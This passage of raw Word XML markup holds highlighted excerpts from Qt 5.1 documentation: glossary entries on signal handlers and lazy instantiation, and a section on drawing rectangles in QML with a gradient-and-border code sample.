                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>signal handler</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Most properties</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of QML objects have a change signal, and also an associated change signal handler which may be defined by clients to implement functionality. For example, the "onClicked()" handler of an instance of the</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId440" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MouseArea</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>type might be defined in an application to cause a sound to be played.</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See</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId441" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Signal and Handler Event System</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more details.</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112022" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Signal Handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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 xml:space="preserve">A signal handler is the expression (or function) which is </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>triggered by a signal</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. It is also known as a "</w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>slot</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>" in C++.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00112022" w:rsidRPr="00953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>See</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId442" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Signal and Handler Event System</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112022" w:rsidRPr="002230B8" w:rsidTr="00D919D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1841"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Lazy Instantiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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112022" w:rsidRPr="00953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Object instances can be instantiated "lazily" at run-time, </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to avoid</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> performing unnecessary work until needed. Qt Quick provides the</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId443" w:history="1">
              <w:r w:rsidRPr="00112022">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Loader</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to make lazy instantiation more convenient.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00112022" w:rsidRPr="00D72F99" w:rsidRDefault="00112022" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D72F99" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId444" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-visual.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00E87E39">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="586" w:name="_Toc483000655"/>
      <w:bookmarkStart w:id="587" w:name="_Toc483003672"/>
      <w:bookmarkStart w:id="588" w:name="_Toc483604008"/>
      <w:bookmarkStart w:id="589" w:name="_Toc483605228"/>
      <w:r w:rsidRPr="00E87E39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Case - Visual Elements In QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="586"/>
      <w:bookmarkEnd w:id="587"/>
      <w:bookmarkEnd w:id="588"/>
      <w:bookmarkEnd w:id="589"/>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00E87E39">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="590" w:name="the-rectangle-type"/>
      <w:bookmarkStart w:id="591" w:name="_Toc483000656"/>
      <w:bookmarkStart w:id="592" w:name="_Toc483003673"/>
      <w:bookmarkStart w:id="593" w:name="_Toc483604009"/>
      <w:bookmarkStart w:id="594" w:name="_Toc483605229"/>
      <w:bookmarkEnd w:id="590"/>
      <w:r w:rsidRPr="00E87E39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Rectangle Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="591"/>
      <w:bookmarkEnd w:id="592"/>
      <w:bookmarkEnd w:id="593"/>
      <w:bookmarkEnd w:id="594"/>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most basic of visuals</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId445" w:history="1">
        <w:r w:rsidRPr="00112022">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides a</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId446" w:history="1">
        <w:r w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type to draw rectangles. These rectangles can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>colored with a color or a vertical gradient</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId447" w:history="1">
        <w:r w:rsidRPr="00112022">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type can also </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>draw borders on the rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>drawing custom shapes beyond rectangles, see the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId448" w:history="1">
        <w:r w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Canvas</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type or display a pre-rendered image using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId449" w:anchor="image" w:history="1">
        <w:r w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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320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480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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#272822"</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320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480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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This element displays a rectangle with a gradient and a border</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Rectangle</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x</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160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y</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radius</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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This gives rounded corners to the Rectangle</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gradient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Gradient</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This sets a vertical gradient fill</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GradientStop</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position</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0.0</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"aqua"</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GradientStop</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position</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"teal"</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border </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3</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"white"</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This sets a 3px wide black border to be drawn</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This rectangle is a plain color with no border</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Rectangle</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x</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40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y</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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
